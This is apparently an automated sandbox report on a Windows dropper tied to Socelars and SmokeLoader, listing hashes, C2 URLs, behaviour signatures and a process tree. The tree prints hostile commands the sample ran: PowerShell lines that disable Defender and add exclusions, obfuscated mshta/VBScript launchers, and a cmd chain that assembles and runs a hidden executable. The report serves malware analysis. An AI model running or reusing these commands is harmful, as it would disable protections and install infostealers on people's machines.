Analysis

  • max time kernel
    13s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    26/12/2021, 18:41

General

  • Target

    2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe

  • Size

    4.4MB

  • MD5

    244f3fcae34a514dd3e78f3d4d72f92a

  • SHA1

    5ac41859cefd7ad0536b36c7e82f33e702514fe2

  • SHA256

    2992c4b00c678a438b0b935e09e0fd341a44c46fe0dd2f18621570f55133e4df

  • SHA512

    245ab74d77796452086c2874af05c7c1d51e7c552c47a655388575cb4add160b743082c4db84f35f2755b2caa78b9b4af2577f1785a4919308fefea20acdc53f

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

smokeloader

Version

2020

C2

rc4.i32

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 55 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
    "C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3116
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1992
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1036
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun0792bfe25c4e6f.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun0792bfe25c4e6f.exe
            Sun0792bfe25c4e6f.exe
            5⤵
            • Executes dropped EXE
            PID:2484
            • C:\Users\Admin\Pictures\Adobe Films\deolLfBLVWWZhjEXo3SGrkJn.exe
              "C:\Users\Admin\Pictures\Adobe Films\deolLfBLVWWZhjEXo3SGrkJn.exe"
              6⤵
                PID:4904
              • C:\Users\Admin\Pictures\Adobe Films\XGd9xmpEaEmn66nGdN1QTt5z.exe
                "C:\Users\Admin\Pictures\Adobe Films\XGd9xmpEaEmn66nGdN1QTt5z.exe"
                6⤵
                  PID:2972
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 664
                    7⤵
                    • Program crash
                    PID:5044
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 680
                    7⤵
                    • Program crash
                    PID:4456
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 640
                    7⤵
                    • Program crash
                    PID:4292
                • C:\Users\Admin\Pictures\Adobe Films\cdsFHRwWn8gYws59jYRHw9lb.exe
                  "C:\Users\Admin\Pictures\Adobe Films\cdsFHRwWn8gYws59jYRHw9lb.exe"
                  6⤵
                    PID:4196
                  • C:\Users\Admin\Pictures\Adobe Films\KFfotjwUdwi0GFVFsJeDM02T.exe
                    "C:\Users\Admin\Pictures\Adobe Films\KFfotjwUdwi0GFVFsJeDM02T.exe"
                    6⤵
                      PID:4856
                    • C:\Users\Admin\Pictures\Adobe Films\CtJuePy1MyQk4W0fAOB7rE5q.exe
                      "C:\Users\Admin\Pictures\Adobe Films\CtJuePy1MyQk4W0fAOB7rE5q.exe"
                      6⤵
                        PID:4288
                      • C:\Users\Admin\Pictures\Adobe Films\pOwxTgYu2mKTgRe1OiTr9Lwe.exe
                        "C:\Users\Admin\Pictures\Adobe Films\pOwxTgYu2mKTgRe1OiTr9Lwe.exe"
                        6⤵
                          PID:4872
                        • C:\Users\Admin\Pictures\Adobe Films\ePGhwMzZ7_bWKGTNIn7y9eom.exe
                          "C:\Users\Admin\Pictures\Adobe Films\ePGhwMzZ7_bWKGTNIn7y9eom.exe"
                          6⤵
                            PID:2000
                          • C:\Users\Admin\Pictures\Adobe Films\2oxIk_KXlBd8OExoW9Xyb3WX.exe
                            "C:\Users\Admin\Pictures\Adobe Films\2oxIk_KXlBd8OExoW9Xyb3WX.exe"
                            6⤵
                              PID:1272
                            • C:\Users\Admin\Pictures\Adobe Films\2xNJlMOtxbrck8lCJlXt9jJz.exe
                              "C:\Users\Admin\Pictures\Adobe Films\2xNJlMOtxbrck8lCJlXt9jJz.exe"
                              6⤵
                                PID:4340
                                • C:\Users\Admin\AppData\Local\Temp\7zS3DE6.tmp\Install.exe
                                  .\Install.exe
                                  7⤵
                                    PID:4988
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4A69.tmp\Install.exe
                                      .\Install.exe /S /site_id "525403"
                                      8⤵
                                        PID:4600
                                  • C:\Users\Admin\Pictures\Adobe Films\JHat5sZc4cNKfO1RLKKYD76t.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\JHat5sZc4cNKfO1RLKKYD76t.exe"
                                    6⤵
                                      PID:356
                                    • C:\Users\Admin\Pictures\Adobe Films\B1ltl3yLoT5Gb98yErXql8ci.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\B1ltl3yLoT5Gb98yErXql8ci.exe"
                                      6⤵
                                        PID:3884
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 400
                                          7⤵
                                          • Program crash
                                          PID:780
                                      • C:\Users\Admin\Pictures\Adobe Films\JlxTFx8xMVyRGqvfG0LjAsSf.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\JlxTFx8xMVyRGqvfG0LjAsSf.exe"
                                        6⤵
                                          PID:2196
                                        • C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"
                                          6⤵
                                            PID:2544
                                            • C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"
                                              7⤵
                                                PID:4172
                                            • C:\Users\Admin\Pictures\Adobe Films\HtWtgehaHrFRM6AXPyOi8Vk8.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\HtWtgehaHrFRM6AXPyOi8Vk8.exe"
                                              6⤵
                                                PID:3676
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun07426f49ca3.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3996
                                            • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07426f49ca3.exe
                                              Sun07426f49ca3.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2864
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun07853f394a6f2.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2844
                                            • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07853f394a6f2.exe
                                              Sun07853f394a6f2.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:952
                                              • C:\Users\Admin\Pictures\Adobe Films\g8Ea5sTtb4AGzNUcMWWY3LW0.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\g8Ea5sTtb4AGzNUcMWWY3LW0.exe"
                                                6⤵
                                                  PID:4728
                                                • C:\Users\Admin\Pictures\Adobe Films\DjVuFsS7eSS9aKu0hxkmYxkg.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\DjVuFsS7eSS9aKu0hxkmYxkg.exe"
                                                  6⤵
                                                    PID:4332
                                                  • C:\Users\Admin\Pictures\Adobe Films\el_JhtsjZqV8Ofskkum4sQdi.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\el_JhtsjZqV8Ofskkum4sQdi.exe"
                                                    6⤵
                                                      PID:4368
                                                    • C:\Users\Admin\Pictures\Adobe Films\ZASI6_un6Lp8XU0mwUdzNjXg.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\ZASI6_un6Lp8XU0mwUdzNjXg.exe"
                                                      6⤵
                                                        PID:1940
                                                      • C:\Users\Admin\Pictures\Adobe Films\FhCHvwomyjXLvMN3TwM0jkTH.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\FhCHvwomyjXLvMN3TwM0jkTH.exe"
                                                        6⤵
                                                          PID:4908
                                                        • C:\Users\Admin\Pictures\Adobe Films\aVPnkV6ppQ7Pi8SA7WzdfkQH.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\aVPnkV6ppQ7Pi8SA7WzdfkQH.exe"
                                                          6⤵
                                                            PID:512
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS37DB.tmp\Install.exe
                                                              .\Install.exe
                                                              7⤵
                                                                PID:1328
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS42E7.tmp\Install.exe
                                                                  .\Install.exe /S /site_id "525403"
                                                                  8⤵
                                                                    PID:4224
                                                              • C:\Users\Admin\Pictures\Adobe Films\ehrdrtNELSEtd7q0K66tgfEx.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\ehrdrtNELSEtd7q0K66tgfEx.exe"
                                                                6⤵
                                                                  PID:3172
                                                                • C:\Users\Admin\Pictures\Adobe Films\I4q4PPuyMW7UrYa77TghPnoq.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\I4q4PPuyMW7UrYa77TghPnoq.exe"
                                                                  6⤵
                                                                    PID:3844
                                                                  • C:\Users\Admin\Pictures\Adobe Films\i6WtrzMGtUVnlWaVNY_6JxIp.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\i6WtrzMGtUVnlWaVNY_6JxIp.exe"
                                                                    6⤵
                                                                      PID:2952
                                                                    • C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"
                                                                      6⤵
                                                                        PID:4840
                                                                        • C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"
                                                                          7⤵
                                                                            PID:4444
                                                                        • C:\Users\Admin\Pictures\Adobe Films\CZXdiaq2wabk2YWB6ciyYwto.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\CZXdiaq2wabk2YWB6ciyYwto.exe"
                                                                          6⤵
                                                                            PID:2456
                                                                          • C:\Users\Admin\Pictures\Adobe Films\eh27mwD6bMTOnrbkwIUtCklL.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\eh27mwD6bMTOnrbkwIUtCklL.exe"
                                                                            6⤵
                                                                              PID:4752
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Sun07689b7dd63a1a2e.exe
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3220
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07689b7dd63a1a2e.exe
                                                                            Sun07689b7dd63a1a2e.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3672
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Sun07aef696b81cc09ee.exe
                                                                          4⤵
                                                                            PID:3216
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07aef696b81cc09ee.exe
                                                                              Sun07aef696b81cc09ee.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:1572
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c Sun07fbac34efb13666.exe
                                                                            4⤵
                                                                              PID:856
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07fbac34efb13666.exe
                                                                                Sun07fbac34efb13666.exe
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:1632
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c Sun0705fdd6f3fa.exe /mixone
                                                                              4⤵
                                                                                PID:1124
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun0705fdd6f3fa.exe
                                                                                  Sun0705fdd6f3fa.exe /mixone
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3244
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 656
                                                                                    6⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Program crash
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4020
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 672
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3984
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 772
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:2004
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 808
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:3116
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 840
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4288
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 896
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4220
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1064
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4152
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1264
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4456
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1304
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4400
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c Sun074812abe11c68090.exe
                                                                                4⤵
                                                                                  PID:408
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe
                                                                                    Sun074812abe11c68090.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3680
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-TLE4F.tmp\Sun074812abe11c68090.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-TLE4F.tmp\Sun074812abe11c68090.tmp" /SL5="$30134,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:2220
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe" /SILENT
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4016
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-55PUN.tmp\Sun074812abe11c68090.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-55PUN.tmp\Sun074812abe11c68090.tmp" /SL5="$50056,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe" /SILENT
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:1048
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c Sun076d6b9f10493573.exe
                                                                                  4⤵
                                                                                    PID:964
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun076d6b9f10493573.exe
                                                                                      Sun076d6b9f10493573.exe
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2596
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Sun074dcdeb3534e450.exe
                                                                                    4⤵
                                                                                      PID:2364
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074dcdeb3534e450.exe
                                                                                        Sun074dcdeb3534e450.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2192
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Sun079abff5ef.exe
                                                                                      4⤵
                                                                                        PID:1912
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun079abff5ef.exe
                                                                                          Sun079abff5ef.exe
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2584
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                            6⤵
                                                                                              PID:1272
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im chrome.exe
                                                                                                7⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:2900
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 1664
                                                                                              6⤵
                                                                                              • Program crash
                                                                                              PID:4568
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Sun07b9107c074617.exe
                                                                                          4⤵
                                                                                            PID:688
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe
                                                                                              Sun07b9107c074617.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2944
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX & IF """" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )
                                                                                                6⤵
                                                                                                  PID:1080
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX & IF "" =="" for %e iN ( "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe" ) do taskkill /f -im "%~nxe"
                                                                                                    7⤵
                                                                                                      PID:3388
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nU82.eXE
                                                                                                        ..\NU82.ExE -pfpj1T6lr~GKuX
                                                                                                        8⤵
                                                                                                          PID:3812
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX & IF ""-pfpj1T6lr~GKuX "" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )
                                                                                                            9⤵
                                                                                                              PID:4208
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX & IF "-pfpj1T6lr~GKuX " =="" for %e iN ( "C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ) do taskkill /f -im "%~nxe"
                                                                                                                10⤵
                                                                                                                  PID:4928
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\System32\mshta.exe" vbscrIPT: CLOSE ( cREATeOBJecT ( "wSCRIpT.ShELl" ). run ( "cmd /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 & eChO | sET /p = ""MZ"" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S +2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz + NXKZ.hO + UX2~UVNN.vM2 ..\vFeGMw.qLW & DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW " , 0 , trUE ) )
                                                                                                                9⤵
                                                                                                                  PID:4616
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 & eChO | sET /p = "MZ" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S +2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz +NXKZ.hO +UX2~UVNN.vM2 ..\vFeGMw.qLW &DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW
                                                                                                                    10⤵
                                                                                                                      PID:1272
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eChO "
                                                                                                                        11⤵
                                                                                                                          PID:5108
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>4LNjycCw.Z2"
                                                                                                                          11⤵
                                                                                                                            PID:4908
                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                            msiexec.exe -y ..\vFEGMW.QlW
                                                                                                                            11⤵
                                                                                                                              PID:4724
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f -im "Sun07b9107c074617.exe"
                                                                                                                        8⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:4128
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 588
                                                                                                                4⤵
                                                                                                                • Program crash
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3076
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                          1⤵
                                                                                                          • Process spawned unexpected child process
                                                                                                          PID:4180
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                            2⤵
                                                                                                              PID:4224
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                            1⤵
                                                                                                              PID:4424

                                                                                                            Network

                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                  Downloads


                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1052-300-0x0000012062EC0000-0x0000012062EC2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1052-319-0x0000012063870000-0x00000120638E2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/1104-143-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    152KB

                                                                                                                  • memory/1104-141-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/1104-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    572KB

                                                                                                                  • memory/1104-133-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    572KB

                                                                                                                  • memory/1104-142-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/1104-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    572KB

                                                                                                                  • memory/1104-136-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/1104-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/1104-135-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/1104-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/1104-138-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/1104-140-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/1144-296-0x00000181ADAD0000-0x00000181ADAD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1144-298-0x00000181AE2A0000-0x00000181AE312000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/1144-294-0x00000181ADAD0000-0x00000181ADAD2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1192-311-0x000002E610480000-0x000002E610482000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1192-312-0x000002E610480000-0x000002E610482000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

